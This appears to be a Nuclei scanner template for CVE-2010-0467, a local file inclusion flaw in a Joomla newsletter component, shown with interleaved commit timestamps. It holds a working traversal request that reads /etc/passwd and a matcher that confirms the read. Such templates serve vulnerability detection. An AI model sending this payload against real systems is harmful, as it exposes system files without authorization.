2021-09-27 11:02:48 +00:00
id : CVE-2010-0467
info :
name : Joomla! Component CCNewsLetter - Local File Inclusion
author : daffainfo
2021-09-27 13:08:18 +00:00
severity : medium
2021-09-27 11:02:48 +00:00
description : Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference : |
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
tags : cve,cve2010,joomla,lfi
2021-09-27 13:08:18 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score : 5.80
cve-id : CVE-2010-0467
cwe-id : CWE-22
2021-09-27 11:02:48 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
- type : status
status :
- 200